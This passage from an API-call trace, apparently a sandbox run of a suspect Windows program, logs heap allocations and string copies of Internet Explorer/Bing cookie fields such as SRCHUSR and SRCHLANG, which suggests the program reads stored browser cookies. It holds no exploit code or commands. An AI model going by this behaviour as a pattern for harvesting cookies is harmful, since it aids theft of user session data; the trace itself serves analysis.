Flags=0x0, Size=0xb) returned 0x61f670 [0181.438] GetProcessHeap () returned 0x5f0000 [0181.438] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f5c0 | out: hHeap=0x5f0000) returned 1 [0181.438] GetProcessHeap () returned 0x5f0000 [0181.438] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f640 [0181.438] GetProcessHeap () returned 0x5f0000 [0181.438] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f480 [0181.438] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0181.438] GetProcessHeap () returned 0x5f0000 [0181.438] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f480 | out: hHeap=0x5f0000) returned 1 [0181.438] GetProcessHeap () returned 0x5f0000 [0181.438] GetProcessHeap () returned 0x5f0000 [0181.438] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f590 [0181.438] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0181.438] GetProcessHeap () returned 0x5f0000 [0181.438] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f590 | out: hHeap=0x5f0000) returned 1 [0181.438] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f640, Size=0xb) returned 0x61f590 [0181.438] GetProcessHeap () returned 0x5f0000 [0181.438] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xb) returned 0x61f5c0 [0181.438] GetProcessHeap () returned 0x5f0000 [0181.438] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f590 | out: hHeap=0x5f0000) returned 1 [0181.438] lstrlenA (lpString="SRCHUSR") returned 7 [0181.438] GetProcessHeap () returned 0x5f0000 [0181.438] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x8) returned 0x61f480 [0181.439] lstrcpyA (in: lpString1=0x61f480, lpString2="SRCHUSR" | out: lpString1="SRCHUSR") returned="SRCHUSR" [0181.439] GetProcessHeap () returned 0x5f0000 [0181.439] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xe) returned 0x61f590 [0181.439] GetProcessHeap () returned 0x5f0000 [0181.439] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f5d0 [0181.439] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0181.439] GetProcessHeap () returned 0x5f0000 [0181.439] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f5d0 | out: hHeap=0x5f0000) returned 1 [0181.439] GetProcessHeap () returned 0x5f0000 [0181.439] GetProcessHeap () returned 0x5f0000 [0181.439] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f5d0 [0181.439] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0181.439] GetProcessHeap () returned 0x5f0000 [0181.439] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f5d0 | out: hHeap=0x5f0000) returned 1 [0181.439] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f590, Size=0xd) returned 0x61f5d0 [0181.439] lstrlenA (lpString="") returned 0 [0181.439] GetProcessHeap () returned 0x5f0000 [0181.439] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f590 [0181.439] lstrcpyA (in: lpString1=0x61f590, lpString2="" | out: lpString1="") returned="" [0181.439] GetProcessHeap () returned 0x5f0000 [0181.439] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f640 [0181.439] GetProcessHeap () returned 0x5f0000 [0181.439] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f860 [0181.439] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0181.439] GetProcessHeap () returned 0x5f0000 [0181.439] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f860 | out: hHeap=0x5f0000) returned 1 [0181.439] GetProcessHeap () returned 0x5f0000 [0181.439] GetProcessHeap () returned 0x5f0000 [0181.439] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f7d0 [0181.440] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0181.440] GetProcessHeap () returned 0x5f0000 [0181.440] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f7d0 | out: hHeap=0x5f0000) returned 1 [0181.440] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f640, Size=0x1) returned 0x61f7a0 [0181.440] GetProcessHeap () returned 0x5f0000 [0181.440] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x12) returned 0x636260 [0181.440] GetProcessHeap () returned 0x5f0000 [0181.440] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f640 [0181.440] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0181.440] GetProcessHeap () returned 0x5f0000 [0181.440] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f640 | out: hHeap=0x5f0000) returned 1 [0181.440] GetProcessHeap () returned 0x5f0000 [0181.440] GetProcessHeap () returned 0x5f0000 [0181.440] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f640 [0181.440] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0181.440] GetProcessHeap () returned 0x5f0000 [0181.440] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f640 | out: hHeap=0x5f0000) returned 1 [0181.440] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x636260, Size=0x11) returned 0x6361a0 [0181.440] lstrlenA (lpString="IE") returned 2 [0181.440] GetProcessHeap () returned 0x5f0000 [0181.440] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x3) returned 0x61f640 [0181.440] lstrcpyA (in: lpString1=0x61f640, lpString2="IE" | out: lpString1="IE") returned="IE" [0181.440] GetProcessHeap () returned 0x5f0000 [0181.440] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x12) returned 0x636260 [0181.440] GetProcessHeap () returned 0x5f0000 [0181.440] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f800 [0181.440] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0181.440] GetProcessHeap () returned 0x5f0000 [0181.440] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f800 | out: hHeap=0x5f0000) returned 1 [0181.440] GetProcessHeap () returned 0x5f0000 [0181.440] GetProcessHeap () returned 0x5f0000 [0181.441] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f6e0 [0181.441] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0181.441] GetProcessHeap () returned 0x5f0000 [0181.441] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f6e0 | out: hHeap=0x5f0000) returned 1 [0181.441] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x636260, Size=0x11) returned 0x6361c0 [0181.441] GetProcessHeap () returned 0x5f0000 [0181.441] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x11) returned 0x636300 [0181.441] GetProcessHeap () returned 0x5f0000 [0181.441] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x636300, Size=0x23) returned 0x6137a0 [0181.441] GetProcessHeap () returned 0x5f0000 [0181.441] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x12) returned 0x6363a0 [0181.441] GetProcessHeap () returned 0x5f0000 [0181.441] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x6363a0, Size=0x27) returned 0x613a10 [0181.441] GetProcessHeap () returned 0x5f0000 [0181.441] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x14) returned 0x636120 [0181.441] GetProcessHeap () returned 0x5f0000 [0181.441] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x636120, Size=0x29) returned 0x613a40 [0181.441] GetProcessHeap () returned 0x5f0000 [0181.441] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x15) returned 0x636220 [0181.441] GetProcessHeap () returned 0x5f0000 [0181.441] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x636220, Size=0x49) returned 0x6209b0 [0181.441] GetProcessHeap () returned 0x5f0000 [0181.441] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x25) returned 0x613bf0 [0181.441] GetProcessHeap () returned 0x5f0000 [0181.441] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x613bf0, Size=0x4b) returned 0x620820 [0181.441] GetProcessHeap () returned 0x5f0000 [0181.441] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x26) returned 0x613770 [0181.441] GetProcessHeap () returned 0x5f0000 [0181.441] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x26) returned 0x613980 [0181.441] GetProcessHeap () returned 0x5f0000 [0181.441] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x613980, Size=0x4d) returned 0x6208c0 [0181.441] GetProcessHeap () returned 0x5f0000 [0181.441] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x27) returned 0x613920 [0181.441] GetProcessHeap () returned 0x5f0000 [0181.441] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x613920, Size=0x65) returned 0x611f60 [0181.441] GetProcessHeap () returned 0x5f0000 [0181.441] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x33) returned 0x635610 [0181.441] GetProcessHeap () returned 0x5f0000 [0181.442] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x635610, Size=0x67) returned 0x627350 [0181.442] GetProcessHeap () returned 0x5f0000 [0181.442] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x34) returned 0x635250 [0181.442] GetProcessHeap () returned 0x5f0000 [0181.442] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x635250, Size=0x7b) returned 0x6273d0 [0181.442] GetProcessHeap () returned 0x5f0000 [0181.442] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x3e) returned 0x635650 [0181.442] GetProcessHeap () returned 0x5f0000 [0181.442] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x635650, Size=0x7d) returned 0x627460 [0181.442] GetProcessHeap () returned 0x5f0000 [0181.442] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x3f) returned 0x635410 [0181.442] GetProcessHeap () returned 0x5f0000 [0181.442] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x635410, Size=0x91) returned 0x625ca0 [0181.442] GetProcessHeap () returned 0x5f0000 [0181.442] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x49) returned 0x6206e0 [0181.442] GetProcessHeap () returned 0x5f0000 [0181.442] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x6206e0, Size=0x93) returned 0x625d50 [0181.442] GetProcessHeap () returned 0x5f0000 [0181.442] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x4a) returned 0x620050 [0181.442] GetProcessHeap () returned 0x5f0000 [0181.442] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x4a) returned 0x620960 [0181.442] GetProcessHeap () returned 0x5f0000 [0181.442] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x620960, Size=0x97) returned 0x625e00 [0181.442] GetProcessHeap () returned 0x5f0000 [0181.442] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x625e00 | out: hHeap=0x5f0000) returned 1 [0181.442] GetProcessHeap () returned 0x5f0000 [0181.442] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x620050 | out: hHeap=0x5f0000) returned 1 [0181.442] GetProcessHeap () returned 0x5f0000 [0181.442] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x625d50 | out: hHeap=0x5f0000) returned 1 [0181.442] GetProcessHeap () returned 0x5f0000 [0181.442] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x625ca0 | out: hHeap=0x5f0000) returned 1 [0181.442] GetProcessHeap () returned 0x5f0000 [0181.442] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x627460 | out: hHeap=0x5f0000) returned 1 [0181.442] GetProcessHeap () returned 0x5f0000 [0181.442] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6273d0 | out: hHeap=0x5f0000) returned 1 [0181.442] GetProcessHeap () returned 0x5f0000 [0181.442] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x627350 | out: hHeap=0x5f0000) returned 1 [0181.442] GetProcessHeap () returned 0x5f0000 [0181.443] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x611f60 | out: hHeap=0x5f0000) returned 1 [0181.443] GetProcessHeap () returned 0x5f0000 [0181.443] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6208c0 | out: hHeap=0x5f0000) returned 1 [0181.443] GetProcessHeap () returned 0x5f0000 [0181.443] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613770 | out: hHeap=0x5f0000) returned 1 [0181.443] GetProcessHeap () returned 0x5f0000 [0181.443] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x620820 | out: hHeap=0x5f0000) returned 1 [0181.443] GetProcessHeap () returned 0x5f0000 [0181.443] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6209b0 | out: hHeap=0x5f0000) returned 1 [0181.443] GetProcessHeap () returned 0x5f0000 [0181.443] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613a40 | out: hHeap=0x5f0000) returned 1 [0181.443] GetProcessHeap () returned 0x5f0000 [0181.443] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613a10 | out: hHeap=0x5f0000) returned 1 [0181.443] GetProcessHeap () returned 0x5f0000 [0181.443] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6137a0 | out: hHeap=0x5f0000) returned 1 [0181.443] GetProcessHeap () returned 0x5f0000 [0181.443] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6361c0 | out: hHeap=0x5f0000) returned 1 [0181.443] GetProcessHeap () returned 0x5f0000 [0181.443] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f640 | out: hHeap=0x5f0000) returned 1 [0181.443] GetProcessHeap () returned 0x5f0000 [0181.443] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6361a0 | out: hHeap=0x5f0000) returned 1 [0181.443] GetProcessHeap () returned 0x5f0000 [0181.443] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f7a0 | out: hHeap=0x5f0000) returned 1 [0181.443] GetProcessHeap () returned 0x5f0000 [0181.443] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f590 | out: hHeap=0x5f0000) returned 1 [0181.443] GetProcessHeap () returned 0x5f0000 [0181.443] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f5d0 | out: hHeap=0x5f0000) returned 1 [0181.443] GetProcessHeap () returned 0x5f0000 [0181.443] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f480 | out: hHeap=0x5f0000) returned 1 [0181.443] GetProcessHeap () returned 0x5f0000 [0181.443] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f5c0 | out: hHeap=0x5f0000) returned 1 [0181.443] GetProcessHeap () returned 0x5f0000 [0181.443] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f670 | out: hHeap=0x5f0000) returned 1 [0181.443] GetProcessHeap () returned 0x5f0000 [0181.443] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f5b0 | out: hHeap=0x5f0000) returned 1 [0181.443] GetProcessHeap () returned 0x5f0000 [0181.443] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f550 | out: hHeap=0x5f0000) returned 1 [0181.443] GetProcessHeap () returned 0x5f0000 [0181.443] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f630 | out: hHeap=0x5f0000) returned 1 [0181.444] GetProcessHeap () returned 0x5f0000 [0181.444] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f530 | out: hHeap=0x5f0000) returned 1 [0181.444] GetProcessHeap () returned 0x5f0000 [0181.444] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f520 | out: hHeap=0x5f0000) returned 1 [0181.444] GetProcessHeap () returned 0x5f0000 [0181.444] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f560 | out: hHeap=0x5f0000) returned 1 [0181.444] GetProcessHeap () returned 0x5f0000 [0181.444] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f5a0 | out: hHeap=0x5f0000) returned 1 [0181.444] GetProcessHeap () returned 0x5f0000 [0181.445] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f490 | out: hHeap=0x5f0000) returned 1 [0181.446] GetProcessHeap () returned 0x5f0000 [0181.446] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f580 | out: hHeap=0x5f0000) returned 1 [0181.446] GetProcessHeap () returned 0x5f0000 [0181.446] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f600 | out: hHeap=0x5f0000) returned 1 [0181.446] GetProcessHeap () returned 0x5f0000 [0181.446] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f4a0 | out: hHeap=0x5f0000) returned 1 [0181.446] GetProcessHeap () returned 0x5f0000 [0181.446] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f620 | out: hHeap=0x5f0000) returned 1 [0181.446] GetProcessHeap () returned 0x5f0000 [0181.446] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f510 | out: hHeap=0x5f0000) returned 1 [0181.446] GetProcessHeap () returned 0x5f0000 [0181.446] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f660 | out: hHeap=0x5f0000) returned 1 [0181.446] GetProcessHeap () returned 0x5f0000 [0181.446] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f540 | out: hHeap=0x5f0000) returned 1 [0181.446] GetProcessHeap () returned 0x5f0000 [0181.446] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613950 | out: hHeap=0x5f0000) returned 1 [0181.446] GetProcessHeap () returned 0x5f0000 [0181.446] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x618a10 | out: hHeap=0x5f0000) returned 1 [0181.446] lstrlenA (lpString="\n") returned 1 [0181.446] GetProcessHeap () returned 0x5f0000 [0181.446] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f5b0 [0181.446] lstrcpyA (in: lpString1=0x61f5b0, lpString2="\n" | out: lpString1="\n") returned="\n" [0181.446] lstrlenA (lpString="\nSRCHHPGUSR\nSRCHLANG=en\nmicrosoft.com/\n1024\n3427097728\n31060332\n3664650269\n30913481\n") returned 84 [0181.446] GetProcessHeap () returned 0x5f0000 [0181.446] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x55) returned 0x618710 [0181.446] lstrcpyA (in: lpString1=0x618710, lpString2="\nSRCHHPGUSR\nSRCHLANG=en\nmicrosoft.com/\n1024\n3427097728\n31060332\n3664650269\n30913481\n" | out: lpString1="\nSRCHHPGUSR\nSRCHLANG=en\nmicrosoft.com/\n1024\n3427097728\n31060332\n3664650269\n30913481\n") returned="\nSRCHHPGUSR\nSRCHLANG=en\nmicrosoft.com/\n1024\n3427097728\n31060332\n3664650269\n30913481\n" [0181.446] GetProcessHeap () returned 0x5f0000 [0181.446] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f620 [0181.446] GetProcessHeap () returned 0x5f0000 [0181.446] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f540 [0181.446] GetProcessHeap () returned 0x5f0000 [0181.446] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f630 [0181.447] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0181.447] GetProcessHeap () returned 0x5f0000 [0181.447] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f630 | out: hHeap=0x5f0000) returned 1 [0181.447] GetProcessHeap () returned 0x5f0000 [0181.447] GetProcessHeap () returned 0x5f0000 [0181.447] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f630 [0181.447] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0181.447] GetProcessHeap () returned 0x5f0000 [0181.447] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f630 | out: hHeap=0x5f0000) returned 1 [0181.447] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f540, Size=0x5) returned 0x61f560 [0181.447] GetProcessHeap () returned 0x5f0000 [0181.447] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f620, Size=0x55) returned 0x6184d0 [0181.447] GetProcessHeap () returned 0x5f0000 [0181.447] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f660 [0181.447] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0181.447] GetProcessHeap () returned 0x5f0000 [0181.447] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f660 | out: hHeap=0x5f0000) returned 1 [0181.447] GetProcessHeap () returned 0x5f0000 [0181.447] GetProcessHeap () returned 0x5f0000 [0181.447] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f510 [0181.447] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0181.447] GetProcessHeap () returned 0x5f0000 [0181.447] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f510 | out: hHeap=0x5f0000) returned 1 [0181.447] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f560, Size=0x9) returned 0x61f620 [0181.447] GetProcessHeap () returned 0x5f0000 [0181.448] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f600 [0181.448] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0181.448] GetProcessHeap () returned 0x5f0000 [0181.448] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f600 | out: hHeap=0x5f0000) returned 1 [0181.448] GetProcessHeap () returned 0x5f0000 [0181.448] GetProcessHeap () returned 0x5f0000 [0181.448] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f630 [0181.448] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0181.448] GetProcessHeap () returned 0x5f0000 [0181.448] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f630 | out: hHeap=0x5f0000) returned 1 [0181.448] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f620, Size=0x11) returned 0x6361a0 [0181.448] GetProcessHeap () returned 0x5f0000 [0181.448] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f600 [0181.448] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0181.448] GetProcessHeap () returned 0x5f0000 [0181.448] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f600 | out: hHeap=0x5f0000) returned 1 [0181.448] GetProcessHeap () returned 0x5f0000 [0181.448] GetProcessHeap () returned 0x5f0000 [0181.448] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f520 [0181.448] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0181.448] GetProcessHeap () returned 0x5f0000 [0181.448] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f520 | out: hHeap=0x5f0000) returned 1 [0181.448] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x6361a0, Size=0x21) returned 0x6139b0 [0181.449] GetProcessHeap () returned 0x5f0000 [0181.449] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f660 [0181.449] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0181.449] GetProcessHeap () returned 0x5f0000 [0181.449] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f660 | out: hHeap=0x5f0000) returned 1 [0181.449] GetProcessHeap () returned 0x5f0000 [0181.449] GetProcessHeap () returned 0x5f0000 [0181.449] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f640 [0181.449] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0181.449] GetProcessHeap () returned 0x5f0000 [0181.449] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f640 | out: hHeap=0x5f0000) returned 1 [0181.449] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x6139b0, Size=0x41) returned 0x620820 [0181.449] GetProcessHeap () returned 0x5f0000 [0181.449] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f4a0 [0181.449] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0181.449] GetProcessHeap () returned 0x5f0000 [0181.449] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f4a0 | out: hHeap=0x5f0000) returned 1 [0181.449] GetProcessHeap () returned 0x5f0000 [0181.449] GetProcessHeap () returned 0x5f0000 [0181.449] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f5c0 [0181.449] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0181.449] GetProcessHeap () returned 0x5f0000 [0181.449] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f5c0 | out: hHeap=0x5f0000) returned 1 [0181.449] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x620820, Size=0x29) returned 0x613770 [0181.449] GetProcessHeap () returned 0x5f0000 [0181.449] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f5b0 | out: hHeap=0x5f0000) returned 1 [0181.450] GetProcessHeap () returned 0x5f0000 [0181.450] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x618710 | out: hHeap=0x5f0000) returned 1 [0181.450] lstrlenA (lpString="/") returned 1 [0181.450] GetProcessHeap () returned 0x5f0000 [0181.450] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f600 [0181.450] lstrcpyA (in: lpString1=0x61f600, lpString2="/" | out: lpString1="/") returned="/" [0181.450] lstrlenA (lpString="SRCHLANG=en") returned 11 [0181.450] GetProcessHeap () returned 0x5f0000 [0181.450] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f5b0 [0181.450] lstrcpyA (in: lpString1=0x61f5b0, lpString2="SRCHLANG=en" | out: lpString1="SRCHLANG=en") returned="SRCHLANG=en" [0181.450] lstrlenA (lpString="SRCHLANG=en") returned 11 [0181.450] GetProcessHeap () returned 0x5f0000 [0181.450] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f620 [0181.450] lstrcpyA (in: lpString1=0x61f620, lpString2="SRCHLANG=en" | out: lpString1="SRCHLANG=en") returned="SRCHLANG=en" [0181.450] GetProcessHeap () returned 0x5f0000 [0181.450] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f510 [0181.450] 